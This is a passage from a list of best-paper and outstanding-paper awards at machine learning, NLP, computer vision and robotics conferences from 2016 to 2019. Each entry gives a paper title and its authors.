Inaba # 3DV 2019 (Québec, Canada. September 16-19, 2019) **Best Paper:** Correspondence-Free Region Localization for Partial Shape Similarity via Hamiltonian Spectrum Alignment Arianna Rampini, Irene Tallini, Alex Bronstein, Maks Ovsjanikov, Emanuele Rodola # ACL 2019 (Florence, Italy. July 28 - August 2, 2019) **Best Short Paper:** Do you know that Florence is packed with visitors? 
Evaluating state-of-the-art models of speaker commitment Nanjiang Jiang, Marie-Catherine de Marneffe **Best Long Paper:** Bridging the Gap between Training and Inference for Neural Machine Translation Wen Zhang, Yang Feng, Fandong Meng, Di You Qun Liu **Outstanding Paper:** Emotion-Cause Pair Extraction: A New Task to Emotion Analysis in Texts Rui Xia, Zixiang Ding A Simple Theoretical Model of Importance for Summarization Maxime Peyrard Transferable Multi-Domain State Generator for Task-Oriented Dialogue Systems Chien-Sheng Wu, Andrea Madotto, Ehsan Hosseini-Asl, Caiming Xiong, Richard Socher, Pascale Fung We need to talk about standard splits Kyle Gorman, Steven Bedrick Zero-shot Word Sense Disambiguation using Sense Definition Embeddings Sawan Kumar, Sharmistha Jat, Karan Saxena, Partha Talukdar **Best Demonstration Paper:** OpenKiwi: An Open Source Framework for Quality Estimation Fabio Kepler, Jonay Trenous, Marcos Treviso, Miguel Vera, André F. T. Martins # RSS 2019 (Freiburg, Germany. June 22-26, 2019) **Best Paper:** A Magnetically-Actuated Untethered Jellyfish-Inspired Soft Milliswimmer Ziyu Ren, Tianlu Wang, Wenqi Hu, Metin Sitti **Best Student Paper:** An Online Learning Approach to Model Predictive Control Nolan Wagener, Ching-an Cheng, Jacob Sacks, Byron Boots **Best Systems Paper:** Learning to Throw Arbitrary Objects with Residual Physics Andy Zeng, Shuran Song, Johnny Lee, Alberto Rodriguez, Thomas A. Funkhouser # CVPR 2019 (Long Beach, USA. June 16-20, 2019) **Best Paper:** A Theory of Fermat Paths for Non-Line-of-Sight Shape Reconstruction Shumian Xin, Sotiris Nousias, Kyros Kutulakos, Aswin Sankaranarayanan, Srinivasa G. Narasimhan, Ioannis Gkioulekas **Best Student Paper:** Reinforced Cross-Modal Matching and Self-Supervised Imitation Learning for Vision-Language Navigation Xin Wang, Qiuyuan Huang, Asli Celikyilmaz, Jianfeng Gao, Dinghan Shen, Yuan-Fang Wang, William Yang Wang, Lei Zhang **Retrospective Most Impactful Paper from CVPR 2009:** ImageNet: A large-scale hierarchical image database Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, Li Fei-Fei # ICML 2019 (Long Beach, USA. June 9-15, 2019) **Best Paper:** Challenging Common Assumptions in the Unsupervised Learning of Disentangled Representations Francesco Locatello, Stefan Bauer, Mario Lucic, Gunnar Rätsch, Sylvain Gelly, Bernhard Schölkopf, Olivier Bachem Rates of Convergence for Sparse Variational Gaussian Process Regression David R. Burt, Carl E. Rasmussen, Mark van der Wilk # ICRA 2019 (Montreal, Canada. May 20-24, 2019) **Best Paper:** Making Sense of Vision and Touch: Self-Supervised Learning of Multimodal Representations for Contact- Rich Tasks Michelle A. Lee, Yuke Zhu, Krishnan Srinivasan, Parth Shah, Silvio Savarese, Li Fei-Fei, Animesh Garg, Jeannette Bohg **Best Student Paper:** Drift-free Roll and Pitch Estimation for High-acceleration Hopping Justin K. Yim, Eric K. 
Wang, Ronald Fearing **Best Automation Paper:** Robotic Orientation Control of Deformable Cells Changsheng Dai, Zhuoran Zhang, Yuchen Lu, Guanqiao Shan, Xian Wang, Qili Zhao, Yu Sun **Best Cognitive Robotics Paper:** Efficient Symbolic Reactive Synthesis for Finite-Horizon Tasks Keliang He, Andrew Wells, Lydia Kavraki, Moshe Vardi **Best Human-Robot Interaction Paper:** Gesture Recognition via Flexible Capacitive Touch Electrodes Louis Dankovich, Sarah Bergbreiter **Best Medical Robotics Paper:** Adaptive Control of Sclera Force and Insertion Depth for Safe Robot-Assisted Retinal Surgery Ali Ebrahimi, Niravkumar Patel, Changyan He, Peter Gehlbach, Marin Kobilarov, Iulian Iordachita **Best Multi-Robot Systems Paper:** Distributed Multi-Robot Formation Splitting and Merging in Dynamic Environments Hai Zhu, Jelle Juhl, Laura Ferranti, Javier Alonso-Mora **Best Robot Manipulation Paper:** Shallow-Depth Insertion: Peg in Shallow Hole through Robotic In-Hand Manipulation Chung Hee Kim, Jungwon Seo **Best Robot Vision Paper:** Geo-Supervised Visual Depth Prediction Xiaohan Fei, Alex Wong, Stefano Soatto **Best Service Robotics Paper:** Multi-Robot Region-of-Interest Reconstruction with Dec-MCTS Fouad Sukkar, Graeme Best, Chanyeol Yoo, Robert Fitch **Best Unmanned Aerial Vehicles Paper:** Design and Control of a Passively Morphing Quadcopter Nathan Bucki, Mark Wilfried Mueller # ICLR 2019 (New Orleans, USA. May 6-9, 2019) **Best Paper:** Ordered Neurons: Integrating Tree Structures into Recurrent Neural Networks Yikang Shen, Shawn Tan, Alessandro Sordoni, Aaron Courville The Lottery Ticket Hypothesis: Finding Sparse, Trainable Neural Networks Jonathan Frankle, Michael Carbin # AAAI 2019 (Honolulu, USA. January 27 - February 1, 2019) **Outstanding Paper:** How to Combine Tree-Search Methods in Reinforcement Learning Yonathan Efroni, Gal Dalal, Bruno Scherrer, Shie Mannor **Outstanding Student Paper:** Zero Shot Learning for Code Education: Rubric Sampling with Deep Learning Inference Mike Wu, Milan Mosse, Noah Goodman, Chris Piech # IJCAI-JAIR 2019 **Best Paper:** Clause Elimination for SAT and QSAT Marijn Heule, Matti Järvisalo, Florian Lonsing, Martina Seidl, Armin Biere # NeurIPS 2018 (Montréal, Canada. December 2-8, 2018) **Best Paper:** Non-delusional Q-learning and Value-iteration Tyler Lu, Dale Schuurmans, Craig Boutilier Optimal Algorithms for Non-Smooth Distributed Optimization in Networks Kevin Scaman, Francis Bach, Sebastien Bubeck, Laurent Massoulié, Yin Tat Lee Nearly Tight Sample Complexity Bounds for Learning Mixtures of Gaussians via Sample Compression Schemes Hassan Ashtiani, Shai Ben-David, Nick Harvey, Christopher Liaw, Abbas Mehrabian, Yaniv Plan Neural Ordinary Differential Equations Tian Qi Chen, Yulia Rubanova, Jesse Bettencourt, David Duvenaud # EMNLP 2018 (Brussels, Belgium. October 31 - November 4, 2018) **Best Long Paper:** Linguistically-Informed Self-Attention for Semantic Role Labeling Emma Strubell, Patrick Verga, Daniel Andor, David Weiss, Andrew McCallum Phrase-Based & Neural Unsupervised Machine Translation Guillaume Lample, Myle Ott, Alexis Conneau, Ludovic Denoyer, Marc'Aurelio Ranzato **Best Short Paper:** How Much Reading Does Reading Comprehension Require? A Critical Investigation of Popular Benchmarks Divyansh Kaushik, Zachary C. 
Lipton **Best Resource Paper:** MultiWOZ — A Large-Scale Multi-Domain Wizard-of-Oz Dataset for Task-Oriented Dialogue Modelling Paweł Budzianowski, Tsung-Hsien Wen, Bo-Hsiang Tseng, Iñigo Casanueva, Stefan Ultes, Osman Ramadan, Milica Gašić # CoRL 2018 (Zürich, Switzerland. October 29-31, 2018) **Best Paper:** Dense Object Nets: Learning Dense Visual Object Descriptors By and For Robotic Manipulation Lucas Manuelli, Peter R. Florence, Russ Tedrake **Best Systems Paper:** Deep Drone Racing: Learning Agile Flight in Dynamic Environments Elia Kaufmann, Antonio Loquercio, Rene Ranftl, Alexey Dosovitskiy, Vladlen Koltun, Davide Scaramuzza QT-Opt: Scalable Deep Reinforcement Learning for Vision-Based Robotic Manipulation Julian Ibarz, Dmitry Kalashnikov, Peter Pastor, Mrinal Kalakrishnan, Deirdre Quillen, Alexander Herzog, Sergey Levine, Vincent Vanhoucke, Ethan Holly, Eric Jang, Alex Irpan **Best Presentation:** Learning over Subgoals for Efficient Navigation of Structured, Unknown Environments Gregory J. Stein, Christopher Bradley, Nicholas Roy # IROS 2018 (Madrid, Spain. October 1-5, 2018) **Best Paper:** Robust Visual-Inertial State Estimation with Multiple Odometries and Efficient Mapping on an MAV with Ultra-Wide FOV Stereo Vision M. G. Müller, F. Steidle, M. J. Schuster, P. Lutz, M. Maier, S. Stoneman, T. Tomic, W. Stürzl **Best Student Paper:** Online Temporal Calibration for Monocular Visual-Inertial Systems Tong Qin, Shaojie Shen **Best Application Paper:** Closed-Loop Single-Beacon Passive Acoustic Navigation for Low-Cost Autonomous Underwater Vehicles Nicholas R. Rypkema, Erin M. Fischell, Henrik Schmidt **Best Cognitive Robotics Paper:** Augmenting Physical Simulators with Stochastic Neural Networks: Case Study of Planar Pushing and Bouncing Anurag Ajay, Jiajun Wu, Nima Fazeli, Maria Bauza, Leslie P. Kaelbling, Joshua B. Tenenbaum, Alberto Rodriguez **Best RoboCup Paper:** Motion Decoupling and Composition via Reduced Order Model Optimization for Dynamic Humanoid Walking with CLF-QP based Active Force Control Aly Magassouba, Komei Sugiura, Hisashi Kawai **Best Novel Technology Paper for Amusement Culture:** Real-Time Dance Generation to Music for a Legged Robot Thomas Bi, Péter Fankhauser, Dario Bellicoso, Marco Hutter Hands and Faces, Fast: Mono-Camera User Detection Robust Enough to Directly Control a UAV in Flight Sepehr MohaimenianPour, Richard Vaughan **Best Safety, Security, and Rescue Robotics Paper:** Fire-Aware Planning of Aerial Trajectories and Ignitions Evan Beachly, Carrick Detweiler, Sebastian Elbaum, Brittany Duncan, Carl Hildebrandt, Dirac Twidwell, Craig Allen # ECCV 2018 (Munich, Germany. September 8-14, 2018) **Best Paper:** Implicit 3D Orientation Learning for 6D Object Detection from RGB Images M. Sundermeyer, Z. Marton, M. Durner, M. Brucker, R. Triebel # 3DV 2018 (Verona, Italy. September 5-8, 2018) **Best Paper:** Robust Fitting of Subdivision Surfaces for Smooth Shape Analysis Virginia Estellers, Frank R. Schmidt, Daniel Cremers **Best Student Paper:** Neural Body Fitting: Unifying Deep Learning and Model Based Human Pose and Shape Estimation Mohamed Omran, Christoph Lassner, Gerard Pons-Moll, Peter Gehler, Bernt Schiele # ACL 2018 (Melbourne, Australia. 
July 15-20, 2018) **Best Short Paper:** Know What You Don’t Know: Unanswerable Questions for SQuAD Pranav Rajpurkar, Robin Jia, Percy Liang ‘Lighter’ Can Still Be Dark: Modeling Comparative Color Descriptions Olivia Winn, Smaranda Muresan **Best Long Paper:** Finding syntax in human encephalography with beam search John Hale, Chris Dyer, Adhiguna Kuncoro, Jonathan Brennan Learning to Ask Good Questions: Ranking Clarification Questions using Neural Expected Value of Perfect Information Sudha Rao, Hal Daumé III Let’s do it “again”: A First Computational Approach to Detecting Adverbial Presupposition Triggers Andre Cianflone, Yulan Feng, Jad Kabbara, Jackie Chi Kit Cheung **Best System Demonstration Paper:** Out-of-the-box Universal Romanization Tool uroman Ulf Hermjakob, Jonathan May, Kevin Knight # ICML 2018 (Stockholm, Sweden. July 10-15, 2018) **Best Paper:** Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples Anish Athalye, Nicholas Carlini, David Wagner Delayed Impact of Fair Machine Learning Lydia Liu, Sarah Dean, Esther Rolf, Max Simchowitz, Moritz Hardt **Test of Time:** A Unified Architecture for Natural Language Processing: Deep Neural Networks with Multitask Learning Ronan Collobert, Jason Weston # RSS 2018 (Pittsburgh, USA. June 26-30, 2018) **Best Paper:** Differentiable Physics and Stable Modes for Tool-Use and Manipulation Planning Marc Toussaint, Kelsey Allen, Kevin Smith, Joshua Tenenbaum **Best Student Paper:** In-Hand Manipulation via Motion Cones Nikhil Chavan Dafle, Rachel Holladay, Alberto Rodriguez **Best Systems Paper:** Embedded High Precision Control and Corn Stand Counting Algorithms for an Ultra-Compact 3D Printed Field Robot Erkan Kayacan, Zhongzhong Zhang, Girish Chowdhary # CVPR 2018 (Salt Lake City, USA. June 18-22, 2018) **Best Paper:** Taskonomy: Disentangling Task Transfer Learning Amir Zamir, Alexander Sax, William Shen, Leonidas Guibas, Jitendra Malik, Silvio Savarese **Best Student Paper:** Total Capture: A 3D Deformation Model for Tracking Faces, Hands, and Bodies Hanbyul Joo, Tomas Simon, Yaser Sheikh **Retrospective Most Impactful Paper from CVPR 2008:** A Discriminatively Trained, Multiscale, Deformable Part Model Pedro Felzenszwalb. David McAllester, Deva Ramanan # ICRA 2018 (Brisbane, Australia. 
May 21-25, 2018) **Best Paper:** Compact Design of a Hydraulic Driving Robot for Intra-operative MRI-guided Bilateral Stereotactic Neurosurgery Ziyan Guo, Ziyang Dong, Kit-Hang Lee, Chim Lee Cheung, Hing Choi Fu, Justin Di-Lang Ho, Haokun He, Wai Sang Poon, Tat-Ming Chan, Ka-Wai Kwok **Best Student Paper:** Design of an Autonomous Racecar: Perception, State Estimation and System Integration Miguel de la Iglesia Valls, Hubertus Franciscus Cornelis Hendrikx, Victor Reijgwart, Fabio Vito Meier, Inkyu Sa, Renaud Dubé, Abel Roman Gawel, Mathias Bürki, Roland Siegwart **Best Automation Paper:** Accurate and Adaptive In situ Fabrication of an Undulated Wall using an On-Board Visual Sensing System Manuel Lussi, Timothy Sandy, Kathrin Doerfler, Norman Hack, Fabio Gramazio, Matthias Daniel Kohler, Jonas Buchli **Best Cognitive Robotics Paper:** Social Attention: Modeling Attention in Human Crowds Anirudh Vemula, Katharina Muelling, Jean Oh **Best Human-Robot Interaction Paper:** Interactively Picking Real-World Objects with Unconstrained Spoken Language Instructions Jun Hatori, Yuta Kikuchi, Sosuke Kobayashi, Kuniyuki Takahashi, Yuta Tsuboi, Yuya Unno, Wilson Kien Ho Ko, Jethro Tan **Best Medical Robotics Paper:** A Lightweight and Efficient Portable Soft Exosuit for Paretic Ankle Assistance in Walking after Stroke Jaehyun Bae, Christopher Siviy, Michael Rouleau, Nicolas Menard, Kathleen O’Donnell, Ignacio Galiana, Maria Athanassiu, Danielle Ryan, Christine Bibeau, Lizeth Sloot, Pawel Kudzia, Terry Ellis, Louis Awad, Conor James Walsh **Best Multi-Robot Systems Paper:** Pairwise Consistent Measurement Set Maximization for Robust Multi-robot Map Merging Joshua Mangelson, Derrick Dominic, Ryan Eustice, Ram Vasudevan **Best Robot Manipulation Paper:** Decentralized Adaptive Control for Collaborative Manipulation Preston Culbertson, Mac Schwager **Best Robot Vision Paper:** Optimization Beyond the Convolution: Generalizing Spatial Relations with End-to-End Metric Learning Philipp Jund, Andreas Eitel, Nichola Abdo, Wolfram Burgard **Best Service Robotics Paper:** PRM-RL: Long-range Robotic Navigation Tasks by Combining Reinforcement Learning and Sampling-based Planning Aleksandra Faust, Oscar Alejandro Ramirez, Marek Fiser, Kenneth Oslund, Anthony Francis, James Davidson, Lydia Tapia **Best Unmanned Aerial Vehicles Paper:** Design, Modeling and Control of Aerial Robot DRAGON: Dual-rotor-embedded-multilink Robot with the Ability of Multi-deGree-of-freedom Aerial TransformatiON Moju Zhao, Tomoki Anzai, Fan Shi, Xiangyu Chen, Kei Okada, Masayuki Inaba # ICLR 2018 (Vancouver, Canada. April 30 - May 3, 2018) **Best Paper:** Continuous Adaptation via Meta-Learning in Nonstationary and Competitive Environments Maruan Al-Shedivat, Trapit Bansal, Yuri Burda, Ilya Sutskever, Igor Mordatch, Pieter Abbeel # AAAI 2018 (New Orleans, USA. February 2-7, 2018) **Outstanding Paper:** Memory-Augmented Monte Carlo Tree Search Chenjun Xiao, Jincheng Mei, and Martin Müller **Outstanding Student Paper:** Counterfactual Multi-Agent Policy Gradients Jakob N. Foerster, Gregory Farquhar, Triantafyllos Afouras, Nantas Nardelli, Shimon Whiteson # NeurIPS 2017 (Long Beach, USA. 
December 4-9, 2017) **Best Paper:** Safe and Nested Subgame Solving for Imperfect-Information Games Noam Brown, Tuomas Sandholm Variance-based Regularization with Convex Objectives Hongseok Namkoong, John Duchi A Linear-Time Kernel Goodness-of-Fit Test Wittawat Jitkrittum, Wenkai Xu, Zoltan Szabo, Kenji Fukumizu, Arthur Gretton **Test of Time:** Random Features for Large-Scale Kernel Machines Ali Rahimi, Benjamin Recht # ICCV 2017 (Venice, Italy. October 22-29, 2017) **Best Paper:** Mask R-CNN K. He, G. Gkioxari, P. Dollar, R. Girshick **Best Student Paper:** Focal Loss for Dense Object Detection T.-Y. Lin, P. Goyal, R. Girshick, K. He, P. Dollar # 3DV 2017 (Qingdao, China. October 10-12, 2017) **Best Paper:** Learning Human Motion Models for Long-term Predictions Partha Ghosh, Jie Song, Emre Aksan, Otmar Hilliges **Best Student Paper:** Sparsity Invariant CNNs Jonas Uhrig, Nick Schneider, Lukas Schneider, Thomas Brox, Andreas Geiger # IROS 2017 (Vancouver, Canada. September 24-28, 2017) **Best Paper:** Repetitive extreme-acceleration (14-g) spatial jumping with Salto-1P **Best Student Paper:** Socially Aware Motion Planning with Deep Reinforcement Learning **Best Application Paper:** A Multi-Track Elevator System for E-Commerce Fulfillment Centers Rachel M. Hoffman, H. Harry Asada **Best Safety, Security, and Rescue Robotics Paper:** Development of a 20-m-long Giacometti Arm with Balloon Body Based on Kinematic Model with Air Resistance Masashi Takeichi, Koichi Suzumori, Gen Endo, Hiroyuki Nabae **Best Cognitive Robotics Paper:** Task-oriented Grasping with Semantic and Geometric Scene Understanding Renaud Detry, Jeremie Papon, Larry Matthies **Best RoboCup Paper:** Online Visual Robot Tracking and Identification using Deep LSTM Networks Hafez Farazi, Sven Behnke **Best Novel Technology Paper for Amusement Culture:** Fabrication, Modeling, and Control of Plush Robots James M. Bern, Grace Kumagai, Stelian Coros # EMNLP 2017 (Copenhagen, Denmark. September 7-11, 2017) **Best Long Paper:** Men Also Like Shopping: Reducing Gender Bias Amplification using Corpus-level Constraints Jieyu Zhao, Tianlu Wang, Mark Yatskar, Vicente Ordonez, Kai-Wei Chang Depression and Self-Harm Risk Assessment in Online Forums Andrew Yates, Arman Cohan, Nazli Goharian **Best Short Paper:** Natural Language Does Not Emerge ‘Naturally’ in Multi-Agent Dialog Satwik Kottur, José Moura, Stefan Lee, Dhruv Batra **Best Resource Paper:** Bringing Structure into Summaries: Crowdsourcing a Benchmark Corpus of Concept Maps Tobias Falke, Iryna Gurevych # ICML 2017 (Sydney, Australia. August 6-11, 2017) **Best Paper:** Understanding Black-box Predictions via Influence Functions Pang Wei Koh, Percy Liang **Test of Time:** Combining Online and Offline Knowledge in UCT Sylvain Gelly, David Silver # ACL 2017 (Vancouver, Canada. July 30 - August 4, 2017) **Best Paper:** Probabilistic Typology: Deep Generative Models of Vowel Inventories Ryan Cotterell, Jason Eisner # CVPR 2017 (Honolulu, USA. July 21-26, 2017) **Best Paper:** Densely Connected Convolutional Networks Gao Huang, Zhuang Liu, Laurens van der Maaten, Kilian Q. Weinberger Learning from Simulated and Unsupervised Images through Adversarial Training Ashish Shrivastava, Tomas Pfister, Oncel Tuzel, Joshua Susskind, Wenda Wang, Russell Webb **Best Student Paper:** Computational Imaging on the Electric Grid Mark Sheinin, Yoav Y. Schechner, Kiriakos N. 
Kutulakos **Retrospective Most Impactful Paper from CVPR 2007:** Object Retrieval with Large Vocabularies and Fast Spatial Matching James Philbin, Ondrej Chum, Michael Isard, Josef Sivic, Andrew Zisserman Accurate, Dense, and Robust Multi-View Stereopsis Y. Furukawa, J. Ponce # RSS 2017 (Cambridge, USA. July 12-16, 2017) **Best Paper:** Asymptotically Optimal Design of Piecewise Cylindrical Robots using Motion Planning Cenk Baykal, Ron Alterovitz **Best Student Paper:** Improving Slip Prediction on Mars Using Thermal Inertia Measurements Christopher Cunningham, Issa Nesnas, William Whittaker **Best Systems Paper:** XPose: Reinventing User Interaction with Flying Cameras Ziquan Lan, Mohit Shridhar, David Hsu, Shengdong Zhao # ICRA 2017 (Singapore, Singapore. May 29 - June 3, 2017) **Best Paper:** Probabilistic Data Association for Semantic SLAM Sean Bowman, Nikolay Atanasov, Kostas Daniilidis, George J. Pappas **Best Student Paper:** Autonomous Robotic Stone Stacking with Online Next Best Object Target Pose Planning Fadri Furrer, Martin Wermelinger, Hironori Yoshida, Fabio Gramazio, Matthias Daniel Kohler, Roland Siegwart, Marco Hutter **Best Automation Paper:** UAV-Based Crop and Weed Classification for Smart Farming Philipp Lottes, Raghav Khanna, Johannes Pfeifer, Roland Siegwart, Cyrill Stachniss **Best Cognitive Robotics Paper:** Learning to Guide Task and Motion Planning Using Score-Space Representation Beomjoon Kim, Leslie Kaelbling, Tomas Lozano-Perez **Best Human-Robot Interaction Paper:** Development of a Block Machine for Volleyball Attack Training Kosuke Sato, Keita Watanabe, Shuichi Mizuno, Masayoshi Manabe, Hiroaki Yano, Hiroo Iwata **Best Medical Robotics Paper:** First Demonstration of Simultaneous Localization and Propulsion of a Magnetic Capsule in a Lumen using a Single Rotating Magnet Katie Popek, Tucker Hermans, Jake Abbott **Best Multi-Robot Systems Paper:** The Robotarium: A Remotely Accessible Swarm Robotics Research Testbed Daniel Pickem, Paul Glotfelter, Li Wang, Mark Mote, Aaron Ames, Eric Feron, Magnus Egerstedt **Best Robot Manipulation Paper:** Analyzing Achievable Stiffness Control Bounds of Robotic Hands with Compliantly Coupled Finger Joints Prashant Rao, Gray Thomas, Luis Sentis, Ashish Deshpande **Best Robot Vision Paper:** Self-supervised Learning of Dense Visual Descriptors Tanner Schmidt, Richard Newcombe, Dieter Fox **Best Service Robotics Paper:** High-Precision Microinjection of Microbeads into C. Elegans Trapped in a Suction Microchannel Masahiro Nakajima, Yuki Ayamura, Masaru Takeuchi, Naoki Hisamoto, Strahil Pastuhov, Yasuhisa Hasegawa, Toshio Fukuda, Qiang Huang # ICLR 2017 (Toulon, France. April 24-26, 2017) **Best Paper:** Making Neural Programming Architectures Generalize via Recursion Jonathon Cai, Richard Shin, Dawn Song Understanding deep learning requires rethinking generalization Chiyuan Zhang, Samy Bengio, Moritz Hardt, Benjamin Recht, Oriol Vinyals Semi-supervised Knowledge Transfer for Deep Learning from Private Training Data Nicolas Papernot, Martín Abadi, Úlfar Erlingsson, Ian Goodfellow, Kunal Talwar # AAAI 2017 (San Francisco, USA. February 4-9, 2017) **Outstanding Paper:** Label-Free Supervision of Neural Networks with Physics and Domain Knowledge Russell Stewart, Stefano Ermon **Outstanding Student Paper:** The Option-Critic Architecture Pierre-Luc Bacon, Jean Harb, Doina Precup # WAFR 2016 (San Francisco, USA. 
December 18-20, 2016) **Best Paper:** A Certifiably Correct Algorithm for Synchronization over the Special Euclidean Group David Rosen, Luca Carlone, Afonso Bandeira, John Leonard # NeurIPS 2016 (Barcelona, Spain. December 5-11, 2016) **Best Paper:** Value Iteration Networks Aviv Tamar, Yi Wu, Garrett Thomas, Sergey Levine, Pieter Abbeel **Best Student Paper:** Matrix Completion has No Spurious Local Minimum Rong Ge, Jason Lee, Tengyu Ma # EMNLP 2016 (Austin, USA. November 1-5, 2016) **Best Paper:** Improving Information Extraction by Acquiring External Evidence with Reinforcement Learning Karthik Narasimhan, Adam Yala, Regina Barzilay Global Neural CCG Parsing with Optimality Guarantees Kenton Lee, Mike Lewis, Luke Zettlemoyer **Best Short Paper:** Learning a Lexicon and Translation Model from Phoneme Lattices Oliver Adams, Graham Neubig, Trevor Cohn, Steven Bird, Quoc Truong Do, Satoshi Nakamura **Best Resource Paper:** SQuAD: 100,000+ Questions for Machine Comprehension of Text Pranav Rajpurkar, Jian Zhang, Konstantin Lopyrev, Percy Liang # 3DV 2016 (Stanford, USA. October 25-28, 2016) **Best Paper:** Depth from Gradients in Dense Light Fields for Object Reconstruction Kaan Yucer, Changil Kim, Alexander Sorkine-Hornung, Olga Sorkine-Hornung # IROS 2016 (Daejeon, Korea. October 9-14, 2016) **Best Paper:** ANYmal - a Highly Mobile and Dynamic Quadrupedal Robot Marco Hutter, Christian Gehring, Dominic Jud, Andreas Lauber, Carmine Dario Bellicoso, Vassilios Tsounis, Jemin Hwangbo, Karen Bodie, Péter Fankhauser, Michael Bloesch, Remo Diethelm, Samuel Bachmann, Amir Melzer, Mark Hoepflinger **Best Student Paper:** Watch This: Scalable Cost-Function Learning for Path Planning in Urban Environments Markus Wulfmeier, Dominic Zeng Wang, Ingmar Posner **Best Application Award Paper:** Skeletal Structure with Artificial Perspiration for Cooling by Latent Heat for Musculoskeletal Humanoid Kengoro Toyotaka Kozuki, Toshinori Hirose, Takuma Shirai, Shinsuke Nakashima, Yuki Asano, Yohei Kakiuchi, Kei Okada, Masayuki Inaba **Best Safety, Security, and Rescue Robotics Paper:** A Palm for a Rock Climbing Robot Based on Dense Arrays of Micro-Spines Shiquan Wang, Hao Jiang, Mark Cutkosky **Best Cognitive Robotics Paper:** Predicting Actions to Act Predictably: Cooperative Partial Motion Planning with Maximum Entropy Models Mark Pfeiffer, Ulrich Schwesinger, Hannes Sommer, Enric Galceran, Roland Siegwart **Best RoboCup Paper:** Multi-Robot Search for a Moving Target: Integrating World Modeling, Task Assignment and Context Francesco Riccio, Emanuele Borzi, Guglielmo Gemignani, Daniele Nardi **Best Novel Technology Paper for Amusement Culture:** Robot Artist for Colorful Picture Painting with Visual Control System Ren Luo, Ming-Jyun Hong, Ping-Chang Chung # ECCV 2016 (Amsterdam, Netherlands. October 8-16, 2016) **Best Paper:** Real-Time 3D Reconstruction and 6-DoF Tracking with an Event Camera H. Kim, S. Leutenegger, A. J. Davison **Best Student Paper:** Focal Flow: Measuring Distance and Velocity with Defocus and Differential Motion Emma Alexander, Qi Guo, Sanjeev Koppal, Steven Gortler, Todd Zickler # ACL 2016 (Berlin, Germany. August 7-12, 2016) **Best Paper:** Finding Non-Arbitrary Form-Meaning Systematicity Using String-Metric Learning for Kernel Regression E. Dario Gutiérrez, Roger Levy, Benjamin Bergen # RSS 2016 (Ann Arbor, USA. 
July 18-22, 2016) **Best Paper:** Efficient Grounding of Abstract Spatial Concepts for Natural Language Interaction with Robot Manipulators Rohan Paul, Jacob Arkin, Nicholas Roy and Thomas M. Howard **Best Student Paper:** Coordinated multi-arm motion planning: Reaching for moving objects in the face of uncertainty Seyed Sina Mirrazavi Salehian, Nadia Figueroa and Aude Billard **Best Systems Paper:** An End-To-End System for Accomplishing Tasks with Modular Robots Gangyuan Jing, Tarik Tosun, Mark Yim, Hadas Kress-Gazit Lessons from the Amazon Picking Challenge: Four Aspects of Building Robotic Systems Clemens Eppner, Sebastian Höfer, Rico Jonschkowski, Roberto Martín-Martín, Arne Sieverling, Vincent Wall, Oliver Brock # CVPR 2016 (Las Vegas, USA. June 26 - July 1, 2016) **Best Paper:** Deep Residual Learning for Image Recognition Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun **Best Student Paper:** Structural-RNN: Deep Learning on Spatio-Temporal Graphs Ashesh Jain, Amir R. Zamir, Silvio Savarese, Ashutosh Saxena **Retrospective Most Impactful Paper from CVPR 2006:** Beyond Bags of Features: Spatial Pyramid Matching for Recognizing Natural Scene Categories S. Lazebnik, C. Schmid, J. Ponce Scalable Recognition with a Vocabulary Tree D. Nister, H. Stewenius # ICML 2016 (New York, USA. June 19-24, 2016) **Best Paper:** Dueling Network Architectures for Deep Reinforcement Learning Ziyu Wang, Tom Schaul, Matteo Hessel, Hado Hasselt, Marc Lanctot, Nando Freitas Pixel Recurrent Neural Networks Aaron Van den Oord, Nal Kalchbrenner, Koray Kavukcuoglu Ensuring Rapid Mixing and Low Bias for Asynchronous Gibbs Sampling Christopher De Sa, Chris Re, Kunle Olukotun **Test of Time:** Dynamic Topic Models David M. Blei, John D. Lafferty # ICRA 2016 (Stockholm, Sweden. May 16-21, 2016) **Best Paper:** A Convex Polynomial Force-Motion Model for Planar Sliding: Identification and Application Jiaji Zhou, Robert Paolini, James Bagnell, Matthew T. Mason **Best Student Paper:** Supersizing Self-supervision: Learning to Grasp from 50K Tries and 700 Robot Hours Lerrel Joseph Pinto, Abhinav Gupta **Best Automation Paper:** Beyond Layers: A 3D-Aware Toolpath Algorithm for Fused Filament Fabrication Samuel Lensgraf, Ramgopal Mettu **Best Human-Robot Interaction Paper:** A Highly Sensitive Dual Mode Tactile Proximity Sensor Using Carbon Microcoils for Robotic Applications Hyo Seung Han, Junwoo Park, Tien Dat Nguyen, Uikyum Kim, Canh Toan Nguyen, Hoa Phung, Hyouk Ryeol Choi **Best Medical Robotics Paper:** Image-Based Robotic System for Enhanced Minimally Invasive Intra-Articular Fracture Surgeries Giulio Dagnino, Ioannis Georgilas, Paul Köhler, R. Atkins, Sanja Dogramadzi **Best Robot Manipulation Paper:** Optimal Control with Learned Local Models: Application to Dexterous Manipulation Vikash Kumar, Emanuel Todorov, Sergey Levine **Best Robot Vision Paper:** Multi-Type Activity Recognition in Robot-Centric Scenarios Ilaria Gori, J.K. Aggarwal, Larry Matthies, Michael S. Ryoo # ICLR 2016 (San Juan, Puerto Rico. May 2-4, 2016) **Best Paper:** Neural Programmer-Interpreters Scott Reed, Nando de Freitas Deep Compression: Compressing Deep Neural Networks with Pruning, Trained Quantization and Huffman Coding Song Han, Huizi Mao, Bill Dally # AAAI 2016 (Phoenix, USA. February 12-17, 2016) **Outstanding Paper:** Bidirectional Search That Is Guaranteed to Meet in the Middle Robert C. Holte, Ariel Felner, Guni Sharon, Nathan R. 
